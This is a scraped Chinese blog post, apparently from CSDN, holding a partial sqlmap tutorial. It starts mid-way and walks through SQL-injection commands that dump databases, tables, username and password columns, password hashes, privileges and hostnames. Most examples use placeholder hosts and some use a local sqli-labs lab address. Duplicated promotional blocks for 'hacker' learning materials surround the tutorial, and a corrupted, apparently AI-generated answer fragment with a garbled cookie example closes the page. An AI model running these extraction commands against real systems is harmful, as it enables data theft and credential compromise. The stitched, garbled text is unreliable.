2024年网络安全最新SQLmap使用教程图文教程(超详细)(1),2024年最新一文搞懂

还有兄弟不知道网络安全面试可以提前刷题吗?费时一周整理的160+网络安全面试题,金九银十,做网络安全面试里的显眼包!

王岚嵚工程师面试题(附答案),只能帮兄弟们到这儿了!如果你能答对70%,找一个安全工作,问题不大。

对于有1-3年工作经验,想要跳槽的朋友来说,也是很好的温习资料!

【完整版领取方式在文末!!】

93道网络安全面试题

内容实在太多,不一一截图了

黑客学习资源推荐

最后给大家分享一份全套的网络安全学习资料,给那些想学习 网络安全的小伙伴们一点帮助!

对于从来没有接触过网络安全的同学,我们帮你准备了详细的学习成长路线图。可以说是最科学最系统的学习路线,大家跟着这个大的方向学习准没问题。

😝朋友们如果有需要的话,可以联系领取~

1️⃣零基础入门
① 学习路线

对于从来没有接触过网络安全的同学,我们帮你准备了详细的学习成长路线图。可以说是最科学最系统的学习路线,大家跟着这个大的方向学习准没问题。

image

② 路线对应学习视频

同时每个成长路线对应的板块都有配套的视频提供:

image-20231025112050764

2️⃣视频配套工具&国内外网安书籍、文档
① 工具

② 视频

image1

③ 书籍

image2

资源较为敏感,未展示全面,需要的最下面获取

在这里插入图片描述在这里插入图片描述

② 简历模板

在这里插入图片描述

因篇幅有限,资料较为敏感仅展示部分资料,添加上方即可获取👆

网上学习资料一大堆,但如果学到的知识不成体系,遇到问题时只是浅尝辄止,不再深入研究,那么很难做到真正的技术提升。

需要这份系统化资料的朋友,可以点击这里获取

一个人可以走的很快,但一群人才能走的更远!不论你是正从事IT行业的老鸟或是对IT行业感兴趣的新人,都欢迎加入我们的的圈子(技术交流、学习资源、职场吐槽、大厂内推、面试辅导),让我们一起学习成长!


### 4、post请求


检测「post请求」的注入点,使用BP等工具「抓包」,将http请求内容保存到txt文件中。


`-r` 指定需要检测的文件,SQLmap会通过post请求方式检测目标。



sqlmap -r bp.txt


### 5、cookie注入


`--cookie` 指定cookie的值,单/双引号包裹。



sqlmap -u “http://xx?id=x” --cookie ‘cookie’


  

## 二、脱库


获取所有内容



sqlmap -u ‘http://xx/?id=1’ -a


`-a` 就是 all 的意思,获取所有能获取的内容,会消耗很长时间。


![在这里插入图片描述](https://img-blog.csdnimg.cn/01daf2f74a7c4075bb1cefcc3d625e1e.png)


### 1、获取数据库


`--dbs` 获取数据库


**1.1、获取数据库版本**



sqlmap -u ‘http://xx/?id=1’ -b


![在这里插入图片描述](https://img-blog.csdnimg.cn/8cd06f314604419b9629f7677bc5643b.png)


最后面显示数据库的版本,这里检测的版本是 5.7.26。


![在这里插入图片描述](https://img-blog.csdnimg.cn/5a44721e54b3491d958bba139208c7d7.png)


**1.2、获取当前使用的数据库**



sqlmap -u ‘http://xx/?id=1’ --current-db


![在这里插入图片描述](https://img-blog.csdnimg.cn/49882fae994f418589ef119ca33bc100.png)


在最后面显示当前使用的数据库的名字是 security。


![在这里插入图片描述](https://img-blog.csdnimg.cn/8c746240c5d646ad9a84ddeae2de5bde.png)


**1.3、获取所有数据库**



sqlmap -u ‘http://xx/?id=1’ --dbs


![在这里插入图片描述](https://img-blog.csdnimg.cn/2c0ba78c9a0e4aa0881e2f4dbbc5f654.png)


最后面显示所有数据库的名字。


![在这里插入图片描述](https://img-blog.csdnimg.cn/fdc273ec6f90464199c77327161f70ff.png)


### 2、获取表


`--tables` 获取表


**2.1、获取表,可以指定数据库**



sqlmap -u ‘http://xx/?id=1’ -D ‘security’ --tables


![在这里插入图片描述](https://img-blog.csdnimg.cn/e5a8a6e460e14fda810082f470b00995.png)


最后面显示数据库(security)里所有的表名。


![在这里插入图片描述](https://img-blog.csdnimg.cn/69abf730a02d49118348ecdd36ee64b7.png)


**2.2、同时获取多个库的表名,库名用逗号分隔。**



sqlmap -u ‘http://xx/?id=1’ -D ‘security,sys’ --tables


![在这里插入图片描述](https://img-blog.csdnimg.cn/7b773cd15ede41d4ac87208a9dda2059.png)


**2.3、不指定数据库,默认获取数据库中所有的表。**



sqlmap -u ‘http://xx/?id=1’ --tables


![在这里插入图片描述](https://img-blog.csdnimg.cn/743fc5fe1e7c4d2892306b29493d89fd.png)  
 最后面显示每个数据库下都有哪些表。


![在这里插入图片描述](https://img-blog.csdnimg.cn/a3f50e971dff47e98455860e6d3ea0d6.png)


  

### 3、获取字段


`--columns` 参数用来获取字段。


**3.1、获取字段,可以指定库和表**


提示:只指定库名但不指定表名会报错。



sqlmap -u ‘http://xx/?id=1’ -D ‘security’ -T ‘users’ --columns


![在这里插入图片描述](https://img-blog.csdnimg.cn/cb615ea8f249498693862c0f4e15199a.png)


最后面显示表(users)中的所有字段。


![在这里插入图片描述](https://img-blog.csdnimg.cn/178bbf3716bb466bad4ba9a80b448d67.png)


**3.2、不指定表名,默认获取当前数据库中所有表的字段。**



sqlmap -u ‘http://xx/?id=1’ --columns


![在这里插入图片描述](https://img-blog.csdnimg.cn/1defc390648f47f68633b7ff6df591b4.png)


### 4、获取字段类型


`--schema` 获取字段类型,可以指定库或指定表。不指定则获取数据库中所有字段的类型。



sqlmap -u ‘http://xx/?id=1’ -D ‘security’ --schema


最后面显示每个表的字段类型。


![在这里插入图片描述](https://img-blog.csdnimg.cn/d334fa96427448fdbed56637b82d7f00.png)


### 5、获取值(数据)


`--dump` 获取值,也就是表中的数据。可以指定具体的库、表、字段。



sqlmap -u ‘http://xx/?id=1’ -D ‘security’ -T ‘users’ -C ‘username,password’ --dump


![在这里插入图片描述](https://img-blog.csdnimg.cn/9388bfc5f3184c53952c519cd82b77ec.png)  
 获取指定库中所有表的数据。



sqlmap -u ‘http://xx/?id=1’ -D ‘security’ --dump


![在这里插入图片描述](https://img-blog.csdnimg.cn/cc3a66cb29594dc7b9b23ebb88bc6fbb.png)


默认获取表中的所有数据,可以使用 `--start` `--stop` 指定开始和结束的行,只获取一部分数据。



sqlmap -u ‘http://xx/?id=1’ -D ‘security’ -T ‘users’ --start 1 --stop 5 --dump


![在这里插入图片描述](https://img-blog.csdnimg.cn/e17811dadf27445488ced927f2a53cce.png)


  

### 6、获取用户


**6.1、获取当前登录数据库的用户**



sqlmap -u ‘http://192.168.31.180/sqli-labs-master/Less-1/?id=1’ --current-user


![在这里插入图片描述](https://img-blog.csdnimg.cn/5ef28b64faf44f10bb9db030b828e94b.png)


最后面显示当前登录数据库的用户是 root@localhost。


![在这里插入图片描述](https://img-blog.csdnimg.cn/ae84fc889e004bbd826623ddf4a62fb7.png)


**6.2、获取所有用户**


`--users` 获取数据库的所有用户名。



sqlmap -u ‘http://xx/?id=1’ --users


![在这里插入图片描述](https://img-blog.csdnimg.cn/f4603b76fa904e10878a48cc90e692a0.png)


最后面显示数据库的所有用户名。


![在这里插入图片描述](https://img-blog.csdnimg.cn/5a870b339f264d90922117a3b1d488b7.png)


**6.3、获取用户密码**


`--passwords` 获取所有数据库用户的密码(哈希值)。


数据库不存储明文密码,只会将密码加密后,存储密码的哈希值,所以这里只能查出来哈希值;当然,你也可以借助工具把它们解析成明文。


![在这里插入图片描述](https://img-blog.csdnimg.cn/92dc7a83615f4d3b94301f1a19327795.png)


最后面显示数据库用户名对应的密码(哈希值)。


![在这里插入图片描述](https://img-blog.csdnimg.cn/ffbcdcd8404a449386f5b062eebf5092.png)


**6.4、获取用户权限**


`--privileges` 查看每个数据库用户都有哪些权限。



sqlmap -u ‘http://192.168.31.180/sqli-labs-master/Less-1/?id=1’ --privileges


![在这里插入图片描述](https://img-blog.csdnimg.cn/902c72402e9144a7aa470693f0e3bff3.png)


最后面显示每个数据库用户所拥有的权限。这里root的权限最多,很明显它就是数据库的管理员账号。


![在这里插入图片描述](https://img-blog.csdnimg.cn/e5618183cd8940ce94aa8a7159f7bc20.png)


**6.5、判断当前用户是不是管理员**


`--is-dba` 判断当前登录的用户是不是数据库的管理员账号。



sqlmap -u ‘http://xx/?id=1’ --is-dba


![在这里插入图片描述](https://img-blog.csdnimg.cn/13ce39532ece4917ba486318b383de8e.png)


如果是管理员,就在最后面显示 true。


![在这里插入图片描述](https://img-blog.csdnimg.cn/95a90f38019e480f981e2bfe1a408f13.png)


  

### 7、获取主机名


`--hostname` 获取服务器主机名。



sqlmap -u ‘http://xx/?id=1’ --hostname


![在这里插入图片描述](https://img-blog.csdnimg.cn/5c5d75f6d0ff41fda1880efef154174f.png)


最后面显示服务器的主机名是 DESKTOP。


![在这里插入图片描述](https://img-blog.csdnimg.cn/5a6ccf6412d94547b0f8d2691da4d209.png)


  

### 8、搜索库、表、字段。


`--search` 搜索数据库中是否存在指定库/表/字段,需要指定库名/表名/字段名。


搜索数据库中有没有 security 这个数据库:



sqlmap -u ‘http://xx/?id=1’ -D ‘security’ --search


![在这里插入图片描述](https://img-blog.csdnimg.cn/ce7476187b2a4ea4b65d5cc54529fb5c.png)


需要手动选择模糊匹配(1)还是完全匹配(2),而后返回匹配的结果。


![在这里插入图片描述](https://img-blog.csdnimg.cn/6283fd6279a44a738004a84428278fa9.png)


也可以搜索表



sqlmap -u ‘http://xxx/?id=1’ -T ‘users’ --search


或者搜索字段



sqlmap -u ‘http://xx/?id=1’ -C ‘username’ --search


  

### 9、正在执行的SQL语句


`--statements` 获取数据库中正在执行的SQL语句。






还有兄弟不知道网络安全面试可以提前刷题吗?费时一周整理的160+网络安全面试题,金九银十,做网络安全面试里的显眼包!


王岚嵚工程师面试题(附答案),只能帮兄弟们到这儿了!如果你能答对70%,找一个安全工作,问题不大。


对于有1-3年工作经验,想要跳槽的朋友来说,也是很好的温习资料!


【完整版领取方式在文末!!】


***93道网络安全面试题***


![](https://img-blog.csdnimg.cn/img_convert/6679c89ccd849f9504c48bb02882ef8d.png)








![](https://img-blog.csdnimg.cn/img_convert/07ce1a919614bde78921fb2f8ddf0c2f.png)





![](https://img-blog.csdnimg.cn/img_convert/44238619c3ba2d672b5b8dc4a529b01d.png)





内容实在太多,不一一截图了


### 黑客学习资源推荐


最后给大家分享一份全套的网络安全学习资料,给那些想学习 网络安全的小伙伴们一点帮助!


对于从来没有接触过网络安全的同学,我们帮你准备了详细的学习成长路线图。可以说是最科学最系统的学习路线,大家跟着这个大的方向学习准没问题。

#### 1️⃣零基础入门


##### ① 学习路线


对于从来没有接触过网络安全的同学,我们帮你准备了详细的**学习成长路线图**。可以说是**最科学最系统的学习路线**,大家跟着这个大的方向学习准没问题。


![image](https://img-blog.csdnimg.cn/img_convert/acb3c4714e29498573a58a3c79c775da.gif#pic_center)


##### ② 路线对应学习视频


同时每个成长路线对应的板块都有配套的视频提供:


![image-20231025112050764](https://img-blog.csdnimg.cn/874ad4fd3dbe4f6bb3bff17885655014.png#pic_center)

**网上学习资料一大堆,但如果学到的知识不成体系,遇到问题时只是浅尝辄止,不再深入研究,那么很难做到真正的技术提升。**

**[需要这份系统化资料的朋友,可以点击这里获取](https://bbs.csdn.net/topics/618540462)**

**一个人可以走的很快,但一群人才能走的更远!不论你是正从事IT行业的老鸟或是对IT行业感兴趣的新人,都欢迎加入我们的的圈子(技术交流、学习资源、职场吐槽、大厂内推、面试辅导),让我们一起学习成长!**

  • 13
    点赞
  • 9
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
很抱歉,我无法提供图文教程。不过,我可以简单地向您介绍一下sqlmap的使用方法。 SQLMap是一个非常强大的工具,用于测试和利用SQL注入漏洞。它可以进行数据库指纹识别、数据库枚举、数据提取、访问目标文件系统,并在获取完全的操作权限时执行任意命令。当常规的注入工具无法利用SQL注入漏洞时,使用SQLMap可能会产生意想不到的效果。您可以按照以下步骤来使用SQLMap: 1. 打开SQLMap。您可以在终端中输入命令“sqlmap”来启动SQLMap。 2. 指定目标URL。***pmaUser-1=7/wV+DOfbmI=;uname=admin;"”。 4. 设置测试级别。使用“--level”参数设置测试级别。级别越高,测试的深度越大。例如,“--level 2”。 5. 运行SQLMap。运行上述命令后,SQLMap将开始对目标URL进行测试。它将自动检测并利用可能存在的SQL注入漏洞。 这只是SQLMap的基本用法,您可以在官方文档中找到更详细的信息和其他高级用法。请注意,在使用SQLMap时要遵守法律和道德标准,并仅在授权范围内进行测试。<span class="em">1</span><span class="em">2</span><span class="em">3</span> #### 引用[.reference_title] - *1* *3* [sqlmap使用图解](https://blog.csdn.net/qq_53568983/article/details/127457605)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_chatgpt_common_search_pc_result","utm_medium":"distribute.pc_search_result.none-task-cask-2~all~insert_cask~default-1-null.142^v92^chatsearchT3_1"}}] [.reference_item style="max-width: 50%"] - *2* [sqlmap使用教程(详细)](https://blog.csdn.net/songbai220/article/details/109303110)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_chatgpt_common_search_pc_result","utm_medium":"distribute.pc_search_result.none-task-cask-2~all~insert_cask~default-1-null.142^v92^chatsearchT3_1"}}] [.reference_item style="max-width: 50%"] [ .reference_list ]
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值